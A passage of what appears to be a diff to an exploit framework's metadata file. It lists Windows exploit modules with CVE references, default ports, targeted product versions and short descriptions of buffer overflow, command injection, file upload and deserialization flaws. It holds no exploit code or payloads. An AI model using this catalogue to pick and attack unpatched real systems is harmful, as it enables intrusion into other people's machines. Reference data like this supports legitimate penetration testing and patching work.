In order to work the target system\n must have a tftp client available.", + "references": [ + "CVE-2008-2286", + "OSVDB-45313", + "BID-29198", + "URL-http://www.zerodayinitiative.com/advisories/ZDI-08-024" + ], + "platform": "Windows", + "arch": "", + "rport": 402, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2003 (with tftp client available)" + ], + "mod_time": "2022-06-29 19:10:52 +0000", + "path": "/modules/exploits/windows/misc/altiris_ds_sqli.rb", + "is_install_path": true, + "ref_name": "windows/misc/altiris_ds_sqli", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/apple_quicktime_rtsp_response": { + "name": "Apple QuickTime 7.3 RTSP Response Header Buffer Overflow", + "fullname": "exploit/windows/misc/apple_quicktime_rtsp_response", + "aliases": [], + "rank": 300, + "disclosure_date": "2007-11-23", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Apple QuickTime 7.3. 
By sending an overly long\n RTSP response to a client, an attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-6166", + "OSVDB-40876", + "BID-26549", + "EDB-4648" + ], + "platform": "Windows", + "arch": "", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "QuickTime 7.3, QuickTime Player 7.3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb", + "is_install_path": true, + "ref_name": "windows/misc/apple_quicktime_rtsp_response", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/asus_dpcproxy_overflow": { + "name": "Asus Dpcproxy Buffer Overflow", + "fullname": "exploit/windows/misc/asus_dpcproxy_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-03-21", + "type": "exploit", + "author": [ + "Jacopo Cervini" + ], + "description": "This module exploits a stack buffer overflow in Asus Dpcroxy version 2.0.0.19.\n It should be vulnerable until version 2.0.0.24.\n Credit to Luigi Auriemma", + "references": [ + "CVE-2008-1491", + "OSVDB-43638", + "BID-28394" + ], + "platform": "Windows", + "arch": "", + "rport": 623, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Asus Dpcroxy version 2.00.19 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/asus_dpcproxy_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/asus_dpcproxy_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/avaya_winpmd_unihostrouter": { + "name": "Avaya WinPMD UniteHostRouter Buffer Overflow", + "fullname": "exploit/windows/misc/avaya_winpmd_unihostrouter", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-05-23", + 
"type": "exploit", + "author": [ + "AbdulAziz Hariri", + "Unknown", + "juan vazquez " + ], + "description": "This module exploits a stack buffer overflow in Avaya WinPMD. The vulnerability\n exists in the UniteHostRouter service, due to the insecure usage of memcpy when\n parsing specially crafted \"To:\" headers. The module has been tested successfully on\n Avaya WinPMD 3.8.2 over Windows XP SP3 and Windows 2003 SP2.", + "references": [ + "OSVDB-82764", + "OSVDB-73269", + "BID-47947", + "EDB-18397", + "URL-https://downloads.avaya.com/css/P8/documents/100140122", + "URL-http://web.archive.org/web/20110527165515/http://secunia.com:80/advisories/44062" + ], + "platform": "Windows", + "arch": "", + "rport": 3217, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Avaya WinPMD 3.8.2 / Windows XP SP3", + "Avaya WinPMD 3.8.2 / Windows 2003 SP2" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/avaya_winpmd_unihostrouter.rb", + "is_install_path": true, + "ref_name": "windows/misc/avaya_winpmd_unihostrouter", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/avidphoneticindexer": { + "name": "Avid Media Composer 5.5 - Avid Phonetic Indexer Buffer Overflow", + "fullname": "exploit/windows/misc/avidphoneticindexer", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-29", + "type": "exploit", + "author": [ + "vt [nick.freeman " + ], + "description": "This module exploits a stack buffer overflow in process\n AvidPhoneticIndexer.exe (port 4659), which comes as part of the Avid Media Composer\n 5.5 Editing Suite. 
This daemon sometimes starts on a different port; if you start\n it standalone it will run on port 4660.", + "references": [ + "CVE-2011-5003", + "OSVDB-77376", + "URL-http://www.security-assessment.com/files/documents/advisory/Avid_Media_Composer-Phonetic_Indexer-Remote_Stack_Buffer_Overflow.pdf" + ], + "platform": "Windows", + "arch": "", + "rport": 4659, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP Professional SP3" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/avidphoneticindexer.rb", + "is_install_path": true, + "ref_name": "windows/misc/avidphoneticindexer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bakbone_netvault_heap": { + "name": "BakBone NetVault Remote Heap Overflow", + "fullname": "exploit/windows/misc/bakbone_netvault_heap", + "aliases": [], + "rank": 200, + "disclosure_date": "2005-04-01", + "type": "exploit", + "author": [ + "hdm ", + "nolimit.bugtraq " + ], + "description": "This module exploits a heap overflow in the BakBone NetVault\n Process Manager service. 
This code is a direct port of the netvault.c\n code written by nolimit and BuzzDee.", + "references": [ + "CVE-2005-1009", + "OSVDB-15234", + "BID-12967" + ], + "platform": "Windows", + "arch": "", + "rport": 20031, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows 2000 SP4 English", + "Windows XP SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bakbone_netvault_heap.rb", + "is_install_path": true, + "ref_name": "windows/misc/bakbone_netvault_heap", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bcaaa_bof": { + "name": "Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow", + "fullname": "exploit/windows/misc/bcaaa_bof", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-04-04", + "type": "exploit", + "author": [ + "Paul Harrington", + "Travis Warren", + "sinn3r " + ], + "description": "This module exploits a stack buffer overflow in process bcaaa-130.exe (port 16102),\n which comes as part of the Blue Coat Authentication proxy. Please note that by default,\n this exploit will attempt up to three times in order to successfully gain remote code\n execution (in some cases, it takes as many as five times). This can cause your activity\n to look even more suspicious. 
To modify the number of exploit attempts, set the\n ATTEMPTS option.", + "references": [ + "CVE-2011-5124", + "OSVDB-72095", + "URL-https://kb.bluecoat.com/index?page=content&id=SA55", + "URL-https://seclists.org/bugtraq/2011/Jul/44" + ], + "platform": "Windows", + "arch": "", + "rport": 16102, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BCAAA Version 5.4.6.1.54128" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bcaaa_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/bcaaa_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server": { + "name": "BigAnt Server 2.2 Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-04-15", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in BigAnt Server 2.2.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2008-1914", + "OSVDB-44454", + "BID-28795" + ], + "platform": "Windows", + "arch": "", + "rport": 6080, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 Pro All English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_250": { + "name": "BigAnt Server 2.50 SP1 Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_250", + "aliases": [], + "rank": 500, + "disclosure_date": "2008-04-15", + "type": "exploit", + "author": [ + 
"Dr_IDE " + ], + "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. This module was tested\n successfully against version 2.50 SP1.", + "references": [ + "CVE-2008-1914", + "OSVDB-44454", + "EDB-9673", + "EDB-9690" + ], + "platform": "Windows", + "arch": "", + "rport": 6660, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt 2.5 Universal", + "Windows 2000 Pro All English", + "Windows XP Pro SP0/SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_250.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_250", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_dupf_upload": { + "name": "BigAnt Server DUPF Command Arbitrary File Upload", + "fullname": "exploit/windows/misc/bigant_server_dupf_upload", + "aliases": [], + "rank": 600, + "disclosure_date": "2013-01-09", + "type": "exploit", + "author": [ + "Hamburgers Maccoy", + "juan vazquez " + ], + "description": "This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.\n A lack of authentication allows to make unauthenticated file uploads through a DUPF\n command. Additionally the filename option in the same command can be used to launch\n a directory traversal attack and achieve arbitrary file upload.\n\n The module uses the Windows Management Instrumentation service to execute an\n arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. 
It\n has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003\n SP2.", + "references": [ + "CVE-2012-6274", + "US-CERT-VU-990652", + "BID-57214", + "OSVDB-89342" + ], + "platform": "Windows", + "arch": "", + "rport": 6661, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt Server 2.97 SP7" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_dupf_upload.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_dupf_upload", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": true + }, + "exploit_windows/misc/bigant_server_sch_dupf_bof": { + "name": "BigAnt Server 2 SCH And DUPF Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_sch_dupf_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2013-01-09", + "type": "exploit", + "author": [ + "Hamburgers Maccoy", + "juan vazquez " + ], + "description": "This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The\n vulnerability is due to the dangerous usage of strcpy while handling errors. 
This\n module uses a combination of SCH and DUPF request to trigger the vulnerability, and\n has been tested successfully against version 2.97 SP7 over Windows XP SP3 and\n Windows 2003 SP2.", + "references": [ + "CVE-2012-6275", + "US-CERT-VU-990652", + "BID-57214", + "OSVDB-89344" + ], + "platform": "Windows", + "arch": "", + "rport": 6661, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt Server 2.97 SP7 / Windows XP SP3", + "BigAnt Server 2.97 SP7 / Windows 2003 SP2" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_sch_dupf_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_sch_dupf_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bigant_server_usv": { + "name": "BigAnt Server 2.52 USV Buffer Overflow", + "fullname": "exploit/windows/misc/bigant_server_usv", + "aliases": [], + "rank": 500, + "disclosure_date": "2009-12-29", + "type": "exploit", + "author": [ + "Lincoln", + "DouBle_Zer0", + "jduck " + ], + "description": "This exploits a stack buffer overflow in the BigAnt Messaging Service,\n part of the BigAnt Server product suite. 
This module was tested\n successfully against version 2.52.\n\n NOTE: The AntServer service does not restart, you only get one shot.", + "references": [ + "CVE-2009-4660", + "OSVDB-61386", + "EDB-10765", + "EDB-10973" + ], + "platform": "Windows", + "arch": "", + "rport": 6660, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "BigAnt 2.52 Universal" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bigant_server_usv.rb", + "is_install_path": true, + "ref_name": "windows/misc/bigant_server_usv", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bomberclone_overflow": { + "name": "Bomberclone 0.11.6 Buffer Overflow", + "fullname": "exploit/windows/misc/bomberclone_overflow", + "aliases": [], + "rank": 200, + "disclosure_date": "2006-02-16", + "type": "exploit", + "author": [ + "Jacopo Cervini " + ], + "description": "This module exploits a stack buffer overflow in Bomberclone 0.11.6 for Windows.\n The return address is overwritten with lstrcpyA memory address,\n the second and third value are the destination buffer,\n the fourth value is the source address of our buffer in the stack.\n This exploit is like a return in libc.\n\n ATTENTION\n The shellcode is exec ONLY when someone try to close bomberclone.", + "references": [ + "CVE-2006-0460", + "OSVDB-23263", + "BID-16697" + ], + "platform": "Windows", + "arch": "", + "rport": 11000, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Automatic", + "Windows XP SP2 Italian", + "Windows 2000 SP1 English", + "Windows 2000 SP1 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bomberclone_overflow.rb", + "is_install_path": true, + "ref_name": "windows/misc/bomberclone_overflow", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + 
"session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/bopup_comm": { + "name": "Bopup Communications Server Buffer Overflow", + "fullname": "exploit/windows/misc/bopup_comm", + "aliases": [], + "rank": 400, + "disclosure_date": "2009-06-18", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Bopup Communications Server 3.2.26.5460.\n By sending a specially crafted packet, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2009-2227", + "OSVDB-55275", + "URL-http://www.blabsoft.com/products/server", + "EDB-9002" + ], + "platform": "Windows", + "arch": "", + "rport": 19810, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Bopup Communications Server 3.2.26.5460" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/bopup_comm.rb", + "is_install_path": true, + "ref_name": "windows/misc/bopup_comm", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/borland_interbase": { + "name": "Borland Interbase Create-Request Buffer Overflow", + "fullname": "exploit/windows/misc/borland_interbase", + "aliases": [], + "rank": 200, + "disclosure_date": "2007-07-24", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Borland Interbase 2007.\n By sending a specially crafted create-request packet, a remote\n attacker may be able to execute arbitrary code.", + "references": [ + "CVE-2007-3566", + "OSVDB-38602", + "URL-http://dvlabs.tippingpoint.com/advisory/TPTI-07-13" + ], + "platform": "Windows", + "arch": "", + "rport": 3050, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows 2000 English All / Borland InterBase 2007" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": 
"/modules/exploits/windows/misc/borland_interbase.rb", + "is_install_path": true, + "ref_name": "windows/misc/borland_interbase", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/borland_starteam": { + "name": "Borland CaliberRM StarTeam Multicast Service Buffer Overflow", + "fullname": "exploit/windows/misc/borland_starteam", + "aliases": [], + "rank": 200, + "disclosure_date": "2008-04-02", + "type": "exploit", + "author": [ + "MC " + ], + "description": "This module exploits a stack buffer overflow in Borland CaliberRM 2006. By sending\n a specially crafted GET request to the STMulticastService, an attacker may be\n able to execute arbitrary code.", + "references": [ + "CVE-2008-0311", + "OSVDB-44039", + "BID-28602" + ], + "platform": "Windows", + "arch": "", + "rport": 3057, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows 2000 SP4 English", + "Windows 2003 SP0 English" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/borland_starteam.rb", + "is_install_path": true, + "ref_name": "windows/misc/borland_starteam", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess": { + "name": "Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess", + "aliases": [], + "rank": 400, + "disclosure_date": "2011-01-20", + "type": "exploit", + "author": [ + "mog" + ], + "description": "This module exploits a stack buffer overflow in Citrix Provisioning Services 5.6.\n By sending a specially crafted packet to the Provisioning Services server, a fixed\n length buffer on the stack can be overflowed and 
arbitrary code can be executed.", + "references": [ + "OSVDB-70597", + "ZDI-11-023", + "URL-http://web.archive.org/web/20110123164820/http://secunia.com:80/advisories/42954/", + "URL-http://support.citrix.com/article/CTX127149" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Windows XP SP3 / Windows Server 2003 SP2 / Windows Vista" + ], + "mod_time": "2023-03-23 10:19:30 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_data_msg": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020000 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_data_msg", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "AbdulAziz Hariri", + "alino <26alino@gmail.com>" + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet to the\n 6905/UDP port. 
The module has been successfully tested on Windows Server 2003 SP2,\n Windows 7, and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "ZDI-12-009", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_data_msg.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_data_msg", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_boot_record_request": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020004 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_boot_record_request", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020004 (GetBootRecordRequest) to the 6905/UDP port. 
The module, which allows\n code execution under the context of SYSTEM, has been successfully tested on Windows Server\n 2003 SP2 and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_boot_record_request.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_boot_record_request", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_footer": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020002 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_footer", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020002 (GetFooterRequest) to the 6905/UDP port. 
The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_footer.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_footer", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/citrix_streamprocess_get_objects": { + "name": "Citrix Provisioning Services 5.6 SP1 Streamprocess Opcode 0x40020006 Buffer Overflow", + "fullname": "exploit/windows/misc/citrix_streamprocess_get_objects", + "aliases": [], + "rank": 300, + "disclosure_date": "2011-11-04", + "type": "exploit", + "author": [ + "Anyway ", + "alino <26alino@gmail.com>", + "juan vazquez " + ], + "description": "This module exploits a remote buffer overflow in the Citrix Provisioning Services\n 5.6 SP1 (without Hotfix CPVS56SP1E043) by sending a malformed packet with the opcode\n 0x40020006 (GetObjetsRequest) to the 6905/UDP port. 
The module, which allows code execution\n under the context of SYSTEM, has been successfully tested on Windows Server 2003 SP2\n and Windows XP SP3.", + "references": [ + "OSVDB-75780", + "BID-49803", + "URL-http://support.citrix.com/article/CTX130846", + "ZDI-12-010" + ], + "platform": "Windows", + "arch": "", + "rport": 6905, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Citrix Provisioning Services 5.6 SP1" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/citrix_streamprocess_get_objects.rb", + "is_install_path": true, + "ref_name": "windows/misc/citrix_streamprocess_get_objects", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/cloudme_sync": { + "name": "CloudMe Sync v1.10.9", + "fullname": "exploit/windows/misc/cloudme_sync", + "aliases": [], + "rank": 500, + "disclosure_date": "2018-01-17", + "type": "exploit", + "author": [ + "hyp3rlinx", + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow vulnerability\n in CloudMe Sync v1.10.9 client application. 
This module has been\n tested successfully on Windows 7 SP1 x86.", + "references": [ + "CVE-2018-6892", + "EDB-44027" + ], + "platform": "Windows", + "arch": "", + "rport": 8888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "CloudMe Sync v1.10.9" + ], + "mod_time": "2020-10-02 17:38:06 +0000", + "path": "/modules/exploits/windows/misc/cloudme_sync.rb", + "is_install_path": true, + "ref_name": "windows/misc/cloudme_sync", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/commvault_cmd_exec": { + "name": "Commvault Communications Service (cvd) Command Injection", + "fullname": "exploit/windows/misc/commvault_cmd_exec", + "aliases": [], + "rank": 400, + "disclosure_date": "2017-12-12", + "type": "exploit", + "author": [ + "b0yd" + ], + "description": "This module exploits a command injection vulnerability\n discovered in Commvault Service v11 SP5 and earlier versions (tested in v11 SP5\n and v10). The vulnerability exists in the cvd.exe service and allows an\n attacker to execute arbitrary commands in the context of the service. By\n default, the Commvault Communications service installs and runs as SYSTEM in\n Windows and does not require authentication. This vulnerability was discovered\n in the Windows version. 
The Linux version wasn't tested.", + "references": [ + "CVE-2017-18044", + "URL-https://www.securifera.com/advisories/sec-2017-0001/" + ], + "platform": "Windows", + "arch": "", + "rport": 8400, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Commvault Communications Service (cvd) / Microsoft Windows 7 and higher" + ], + "mod_time": "2020-09-22 02:56:51 +0000", + "path": "/modules/exploits/windows/misc/commvault_cmd_exec.rb", + "is_install_path": true, + "ref_name": "windows/misc/commvault_cmd_exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/crosschex_device_bof": { + "name": "Anviz CrossChex Buffer Overflow", + "fullname": "exploit/windows/misc/crosschex_device_bof", + "aliases": [], + "rank": 300, + "disclosure_date": "2019-11-28", + "type": "exploit", + "author": [ + "Luis Catarino ", + "Pedro Rodrigues ", + "agalway-r7", + "adfoster-r7" + ], + "description": "Waits for broadcasts from Ainz CrossChex looking for new devices, and returns a custom broadcast,\n triggering a stack buffer overflow.", + "references": [ + "CVE-2019-12518", + "URL-https://www.0x90.zone/multiple/reverse/2019/11/28/Anviz-pwn.html", + "EDB-47734" + ], + "platform": "Windows", + "arch": "x86", + "rport": null, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "Crosschex Standard x86 <= V4.3.12" + ], + "mod_time": "2020-03-05 14:48:37 +0000", + "path": "/modules/exploits/windows/misc/crosschex_device_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/crosschex_device_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/cve_2022_28381_allmediaserver_bof": { + "name": "ALLMediaServer 1.6 SEH Buffer Overflow", + "fullname": "exploit/windows/misc/cve_2022_28381_allmediaserver_bof", + "aliases": [], + 
"rank": 400, + "disclosure_date": "2022-04-01", + "type": "exploit", + "author": [ + "Hejap Zairy Al-Sharif" + ], + "description": "This module exploits a stack buffer overflow leading to a SEH handler overwrite\n in ALLMediaServer 1.6. The vulnerability is caused due to a boundary error\n within the handling of a HTTP request. Note that this exploit will only work\n against x86 or WoW64 targets, x64 is not supported at this time.", + "references": [ + "CVE-2022-28381", + "URL-https://github.com/Matrix07ksa/ALLMediaServer-1.6-Buffer-Overflow" + ], + "platform": "Windows", + "arch": "x86", + "rport": 888, + "autofilter_ports": [], + "autofilter_services": [], + "targets": [ + "ALLMediaServer 1.6" + ], + "mod_time": "2022-04-01 17:57:27 +0000", + "path": "/modules/exploits/windows/misc/cve_2022_28381_allmediaserver_bof.rb", + "is_install_path": true, + "ref_name": "windows/misc/cve_2022_28381_allmediaserver_bof", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-service-down" + ], + "Reliability": [ + "repeatable-session" + ], + "SideEffects": [ + "ioc-in-logs" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/delta_electronics_infrasuite_deserialization": { + "name": "Delta Electronics InfraSuite Device Master Deserialization", + "fullname": "exploit/windows/misc/delta_electronics_infrasuite_deserialization", + "aliases": [], + "rank": 600, + "disclosure_date": "2023-05-17", + "type": "exploit", + "author": [ + "Anonymous", + "Shelby Pace" + ], + "description": "Delta Electronics InfraSuite Device Master versions below v1.0.5 have an\n unauthenticated .NET deserialization vulnerability within the 'ParseUDPPacket()'\n method of the 'Device-Gateway-Status' process.\n\n The 'ParseUDPPacket()' method reads user-controlled packet data and eventually\n calls 'BinaryFormatter.Deserialize()' on what it determines to be the packet header without appropriate validation,\n leading 
to unauthenticated code execution as the user running the 'Device-Gateway-Status' process.", + "references": [ + "CVE-2023-1133", + "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-672/", + "URL-https://attackerkb.com/topics/owl4Xz8fKW/cve-2023-1133" + ], + "platform": "Windows", + "arch": "cmd, x86, x64", + "rport": 10100, + "autofilter_ports": [ + 80, + 8080, + 443, + 8000, + 8888, + 8880, + 8008, + 3000, + 8443 + ], + "autofilter_services": [ + "http", + "https" + ], + "targets": [ + "Windows EXE Dropper", + "Windows CMD" + ], + "mod_time": "2023-06-07 16:42:01 +0000", + "path": "/modules/exploits/windows/misc/delta_electronics_infrasuite_deserialization.rb", + "is_install_path": true, + "ref_name": "windows/misc/delta_electronics_infrasuite_deserialization", + "check": true, + "post_auth": false, + "default_credential": false, + "notes": { + "Stability": [ + "crash-safe" + ], + "SideEffects": [ + "artifacts-on-disk", + "ioc-in-logs", + "screen-effects" + ], + "Reliability": [ + "repeatable-session" + ] + }, + "session_types": false, + "needs_cleanup": null + }, + "exploit_windows/misc/disk_savvy_adm": { + "name": "Disk Savvy Enterprise v10.4.18", + "fullname": "exploit/windows/misc/disk_savvy_adm", + "aliases": [], + "rank": 500, + "disclosure_date": "2017-01-31", + "type": "exploit", + "author": [ + "Daniel Teixeira" + ], + "description": "This module exploits a stack-based buffer overflow 